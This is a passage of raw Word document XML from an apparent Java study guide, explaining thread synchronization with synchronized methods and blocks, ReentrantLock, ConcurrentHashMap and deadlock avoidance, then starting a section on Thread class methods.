          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Synchronized Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155A10EF"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he simplest form of synchronization is by declaring methods as synchronized. When a method is declared as synchronized, the thread holds the lock for the object for the duration of that method’s execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B486B01"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public class Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643DD875"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private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A5EB34" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3CF68A"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 Synchronized method ensures only one thread can access this method at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB055D"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public synchronized void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6799BD17"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF8024F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387D5A34" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFA5E00"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public int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF4E910"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649DD417"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE68EC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106BF529"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In this example, only one thread can call the increment() method at a time. If multiple threads call increment(), they will wait for the lock to be released by the currently executing thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A8EE0E" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Synchronized Blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C13F7E"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In addition to synchronizing the entire method, you can also use synchronized blocks within methods to synchronize only the critical section of code that needs protection. This is useful when you don't need to lock the entire method but only a part of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AD8549"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public class Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DF2A6B"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private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6B301A" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D211822"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public void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A79D28"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synchronized (this) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E44C1FA"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED2615F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EE5347"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFD957E" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="275D06A6"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public int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D4DC28"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0EB9CF"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FAF46C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407F8BE1"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In the above example, the synchronized block ensures that only one thread can increment the count variable at a time. It also allows you to fine-tune the granularity of synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78261CDD" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Locks and ReentrantLock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692E3A3A"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Instead of using synchronized methods or blocks, Java provides a more advanced mechanism for synchronization via the Lock interface (e.g., ReentrantLock). Locks give you more control over synchronization, including the ability to try to acquire a lock, interrupting thread execution, or releasing a lock manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7CAB4C"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import java.util.concurrent.locks.Lock;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C44F7D"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import java.util.concurrent.locks.ReentrantLock;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602A2FD2" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D797B15"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public class Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4873AEC4"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private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190482C0"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private Lock lock = new ReentrantLock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D18C8A7" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD6A4C2"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public void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B6425"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lock.lock();  // Acquiring the lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BDA5BA"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8B9294"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8338F2"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 finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2C5516"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lock.unlock();  // Releasing the lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8F72B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBF2614"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6624B7F6" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B24B62"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public int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3802C179"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC514C0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB9E2C5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693D4AF3" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1162"/>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ReentrantLock provides more flexibility, such as the ability to try locking with tryLock() or using lockInterruptibly() to acquire a lock with interruption handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F712CA2" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1162"/>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he finally block is important to ensure that the lock is always released, even if an exception occurs inside the critical section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CA3351" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Concurrent Collections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1F9CFD"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Java provides thread-safe collection classes, such as ConcurrentHashMap, CopyOnWriteArrayList, and others, that manage synchronization internally. These classes are designed for multi-threaded environments where threads might concurrently access or modify the collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD68BB2"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Example using ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BA1A2E"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import java.util.concurrent.ConcurrentHashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B53D7" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1C4623"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public class SharedData {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BB56D4"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private ConcurrentHashMap&lt;String, Integer&gt; map = new ConcurrentHashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFEB9A3" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30248C04"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public void addData(String key, Integer value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051C3B37"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map.put(key, value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27186494"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD7530F" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789A69B8"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public Integer getData(String key) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D6C109"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return map.get(key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B86697"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48446D0C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04183610"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ConcurrentHashMap allows concurrent read and write operations with thread-safe mechanisms internally, making it a preferred choice over HashMap when working with multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDEA8FA" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Concepts in Thread Synchronization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C055C42" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1163"/>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Monitor (Intrinsic Lock):</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every object in Java has an implicit lock or monitor. Only one thread can hold the lock at a time for a synchronized method or block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B116DC" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1163"/>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lastRenderedPageBreak/>
        <w:t>Deadlock:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A situation where two or more threads are blocked forever due to waiting for each other to release locks. This can be avoided by following a proper locking order and using timeout mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C6C951" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1163"/>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Starvation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Occurs when a thread is unable to gain regular access to the resources it needs because other threads are always being given preference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2608A2" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Best Practices for Thread Synchronization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17261163" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>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Minimize the scope of synchronization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keep the synchronized block as small as possible to minimize the performance overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A75B0F9" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>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Use high-level concurrency utilities:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prefer using high-level synchronization tools like ExecutorService, ReentrantLock, Semaphore, or concurrent collections instead of low-level synchronization with synchronized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0013082B" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>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Avoid deadlock:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that threads acquire locks in a consistent order to prevent circular dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752D0693" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B623501" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF"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hread synchronization in Java ensures that multiple threads can safely interact with shared resources without leading to data corruption or inconsistencies. Using synchronization mechanisms such as synchronized methods, ReentrantLock, and concurrent collections, developers can ensure thread safety in concurrent programs while minimizing performance issues such as deadlocks and race conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F02CDD" w14:textId="0207209E" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D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F1DB721">
          <v:rect id="_x0000_i1842" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE9B7D6" w14:textId="77777777" w:rsidR="002B412F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B412F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="276" w:name="_Toc196307756"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the methods of thread?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="276"/>
    </w:p>
    <w:p w14:paraId="2281F5E1" w14:textId="71A0A644" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In Java, threads are represented by the Thread class, which provides several methods to control the behavior of threads. These methods allow you to manage the thread's lifecycle, check its state, and control its execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC27B32" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD"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Here are the commonly used methods of the Thread class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FD31CA" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6BD957" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Starts the execution of a thread. It invokes the run() method in a new thread of execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7DB8F8" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2DDE2F" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>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public void start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B16D9E" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>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Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When you call start(), the thread enters the </w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> state and the run() method is invoked by the Java runtime. The run() method contains the code that will be executed by the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C7173F"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hread t = new Thread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3A55B"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start();  // Starts the thread execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687B42E3" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
